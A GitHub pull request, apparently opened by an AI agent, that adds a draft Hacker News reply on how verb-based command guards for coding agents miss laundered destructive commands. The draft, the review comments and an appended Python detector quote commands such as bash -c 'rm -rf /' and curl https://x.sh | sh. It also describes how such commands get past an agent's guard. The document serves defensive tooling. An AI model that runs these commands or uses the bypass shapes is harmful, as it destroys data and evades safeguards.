
[claude-hackernews] Reply draft: Pi-hosts Show HN, args-level laundering vs verb-tier classification (id=47943466)#48

Open
NiveditJain wants to merge 1 commit into main from luv-57


@NiveditJain NiveditJain commented May 4, 2026

Summary

  • Draft reply on Show HN: Pi-hosts -- Give the Pi coding agent access to your servers (https://news.ycombinator.com/item?id=47943466).
  • Adjacent-product Show HN; OP describes a tiered command-risk + approval-mode policy (4 risk tiers x 5 modes). Substantive engagement: verb-classification leaves a gap for laundered destructive ops (bash -c '...', sh -lc, curl ... | sh, apt-get install postinst).
  • One FailProof anchor: block-curl-pipe-sh as the args-level companion to a name-classifier. Disclosure line at top, ASCII-only punctuation, ~135 words.

Discovery path (browser-driven, no API mirrors)

  • /ask, /show, /news scanned via browser_get_html on table#hnmain.
  • hn.algolia.com search rotated across queries: claude code deleted, agent guardrails, claude code rm -rf, agent destroyed, agent sandbox, tool call policy, Show HN agent, Show HN MCP, Show HN policy, coding agent, claude code, accidentally deleted, AI agent deleted database. Most hits already covered or off-topic.
  • Pi-hosts surfaced via the Show HN policy query; verified uncovered against drafts/, comments/, and the open-PR diff scan.

Three-surface duplicate check (item?id=47943466)

  • grep -rl "item?id=47943466" drafts/ comments/ -> no hits.
  • gh pr list --state all cross-diff scan -> no hits across all 47 prior PRs.

Thread-fit notes

  • Falls in the Show HN of an adjacent product where the OP solicits design discussion lane (INSTRUCTIONS), not the concrete-failure-post lane.
  • Reply form rendered (not closed). Thread is stale (5 days, 0 comments) but the OP is the realistic audience for a small Show HN; substantive peer engagement is high-value to a solo author.
  • Pi-hosts and FailProof are stack-adjacent: Pi-hosts gates SSH-out on the host side; FailProof gates the local agent's tool calls before any of those host_exec invocations happen. The reply makes the design-contrast cleanly without claiming overlap.

Brand-voice / anti-pitch checks

  • Disclosure line at top in the prescribed (disclosure: I work on FailProof AI: <repo URL>) form.
  • One paragraph of substantive on-topic content (verb-classification gap, command laundering examples) that stands on its own with the FailProof mention removed.
  • ONE policy named (block-curl-pipe-sh), tied directly to the laundering-shape gap. No comma-list of policies. No snippet (so the one OR the other rule is satisfied).
  • No install command, no scope-merge / 39-policies / ~/.failproofai/ talk, no two-link pattern (disclosure URL only), no dashboard plug, no marketing connectives.
  • ASCII-only punctuation: hyphens, three-dot ellipses, straight quotes; letter x not ×.

Test plan

  • Review the draft body against INSTRUCTIONS.md "Tone for discussing it on HN" and the working-example anchor (comments/2026-04-29T043958Z.md).
  • If happy: paste the body into the textarea on https://news.ycombinator.com/item?id=47943466 from the chosen account, click add comment, copy the resulting comment permalink.
  • If posted: ask the agent to append the comment permalink to the HN: line and re-commit, then merge this PR (merge = "I posted it").
  • If rejecting: close this PR without merging; the draft becomes a record of the considered-and-skipped attempt.

Draft file: drafts/2026-05-04T051522Z.md

Summary by CodeRabbit

  • Documentation
    • Added draft post examining SSH access security for AI coding agents, covering risk-assessment methodologies, security approach analysis, system integration patterns, and implementation findings including validation constraints and best practices.

coderabbitai Bot commented May 4, 2026

Walkthrough

A new draft markdown file is added to document a Hacker News post about pi-hosts, an SSH access extension for AI coding agents. The draft includes the HN link, a proposed comment on risk-classification approaches, an integration insight for the FailProof team, and development notes.

Changes

Draft HN Post: pi-hosts Response

| Layer / File(s) | Summary |
|---|---|
| HN Post Introduction: drafts/2026-05-04T051522Z.md (lines 1–15) | HN link, OP/story summary of pi-hosts with installation and default modes ("balanced" vs "paranoid"). |
| Proposed Comment: drafts/2026-05-04T051522Z.md (lines 16–23) | Top-level reply critiquing verb-based risk classification and proposing args-shape inspection via block-curl-pipe-sh pattern. |
| Team Integration Insight: drafts/2026-05-04T051522Z.md (lines 24–27) | Mapping of how Pi-hosts and FailProof complement each other (SSH-out gating vs local tool-call blocking) and ecosystem alignment around risk taxonomies. |
| Development Notes: drafts/2026-05-04T051522Z.md (lines 28–35) | Findings on thread age, matrix accuracy, punctuation constraints, forbidden patterns, body length, and draft status. |

Estimated Code Review Effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

Poem

A rabbit hops through pi-host trees,
SSH doors swing open with ease,
FailProof's walls and the hosts align,
Safe gateways built on risk design! 🐰✨
New drafts take shape, ideas take flight,
Thoughts on the HN stage, burning bright.

🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)
| Check name | Status | Explanation |
|---|---|---|
| Description Check | ✅ Passed | Check skipped - CodeRabbit’s high-level summary is enabled. |
| Title check | ✅ Passed | The title directly and specifically describes the main change: adding a reply draft about Pi-hosts with focus on args-level security analysis vs verb classification, including the HN item ID. |
| Docstring Coverage | ✅ Passed | No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check. |
| Linked Issues check | ✅ Passed | Check skipped because no linked issues were found for this pull request. |
| Out of Scope Changes check | ✅ Passed | Check skipped because no linked issues were found for this pull request. |

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

📥 Commits

Reviewing files that changed from the base of the PR and between ebbce06 and faa12bc.

📒 Files selected for processing (1)
  • drafts/2026-05-04T051522Z.md

Comment on lines +18 to +22
```
(disclosure: I work on FailProof AI: https://github.com/exospherehost/failproofai)

The risk-tier x approval-mode matrix is a real step up from "approve everything vs approve nothing", but classifying by the surface verb leaves a gap. `bash -c 'rm -rf /'` is a `bash` invocation, `sh -lc "..."` is a `sh` invocation, `curl https://x.sh | sh` is technically a `curl`, and an `apt-get install` flagged caution can fetch a postinst that does anything once it runs. Once you're shelling remote commands at all, the dangerous ones don't always wear their tier on their sleeve. A complementary pattern in FailProof is `block-curl-pipe-sh`: it doesn't try to classify the verb, it inspects the args for the laundering shape. Pairing tier classification with a couple of args-level matchers covers the cases tier-mapping alone can't see.
```

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Add a language tag to the fenced block to satisfy markdownlint.

Line 18 opens a fenced code block without a language, which triggers MD040. Use an explicit language (for example text) to keep lint clean.

Suggested patch
-```
+```text
 (disclosure: I work on FailProof AI: https://github.com/exospherehost/failproofai)
@@
-```
+```
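Review bot: the second hunk removes and re-adds an identical closing fence, so it changes nothing; MD040 is reported only for the opening fence on line 18, and the patch can be reduced to the first hunk. The bare @@ separator also carries no line ranges, so the patch as written would need them restored before it could be applied mechanically.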
🧰 Tools
🪛 markdownlint-cli2 (0.22.1)

[warning] 18-18: Fenced code blocks should have a language specified

(MD040, fenced-code-language)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@drafts/2026-05-04T051522Z.md` around lines 18 - 22, The fenced code block
opened with triple backticks (```) triggers markdownlint MD040 because it lacks
a language tag; update that opening fence to include a language (e.g., change
``` to ```text) so the block reads ```text ... ``` and the linter no longer
flags MD040, ensuring the block content (the paragraph mentioning "FailProof AI"
and "block-curl-pipe-sh") remains unchanged.
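
The gap the draft reply describes, shown as an added example that is not code from this PR, from Pi-hosts or from FailProof: a first-word tier lookup next to an args-level check that unwraps shell `-c` payloads and flags a fetcher piped into a shell. The tier table, shape names and function names are assumptions made for illustration; this is not how `block-curl-pipe-sh` is implemented.

```python
import re
import shlex

# Constructed verb -> tier table for illustration (not Pi-hosts' real mapping).
TIERS = ["safe", "caution", "danger"]
VERB_TIER = {"ls": 0, "cat": 0, "curl": 1, "wget": 1, "bash": 1, "sh": 1,
             "apt-get": 1, "rm": 2}
SHELLS, FETCHERS = {"sh", "bash", "dash", "zsh"}, {"curl", "wget"}
# Constructed sample commands (the shapes named in the draft reply).
SAMPLES = ["bash -c 'rm -rf /'", 'sh -lc "curl https://x.sh | sh"', "ls -la"]

def stages(cmd):
    """Split on unquoted '|' into argv lists; quoted text stays one token."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars="|")
    lex.whitespace_split, lex.commenters = True, ""
    out = [[]]
    for tok in lex:
        if tok == "|":
            out.append([])
        else:
            out[-1].append(tok)
    return [argv for argv in out if argv]

def verb_tier(cmd):
    """What a name-classifier sees: the tier of the first word only."""
    p = stages(cmd)
    return TIERS[VERB_TIER.get(p[0][0].rsplit("/", 1)[-1], 1)] if p else "safe"

def analyze(cmd, depth=0):
    """Return (worst tier index, shapes found), unwrapping shell -c payloads."""
    try:
        pipeline = stages(cmd)
    except ValueError:                 # unbalanced quotes: do not guess
        return 2, {"unparseable"}
    if depth > 4:                      # bound nested wrappers
        return 2, {"nesting-too-deep"}
    names = [argv[0].rsplit("/", 1)[-1] for argv in pipeline]
    tier, shapes = max((VERB_TIER.get(n, 1) for n in names), default=0), set()
    for i, (name, argv) in enumerate(zip(names, pipeline)):
        if name not in SHELLS:
            continue
        if any(n in FETCHERS for n in names[:i]):   # curl ... | sh
            tier, shapes = 2, shapes | {"fetch-pipe-shell"}
        for j in range(1, len(argv) - 1):
            if re.fullmatch(r"-[a-z]*c", argv[j]):  # -c, -lc, -ic ...
                sub_tier, sub = analyze(argv[j + 1], depth + 1)
                tier = max(tier, sub_tier)
                shapes |= {"shell-dash-c"} | sub
                break
    return tier, shapes
```

On the constructed `SAMPLES`, `verb_tier` reports caution for both wrapped commands while `analyze` returns tier index 2 (danger) with the matched shapes. A postinst script pulled in by `apt-get install` does not appear in the arguments, so it stays outside what this matcher can see.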
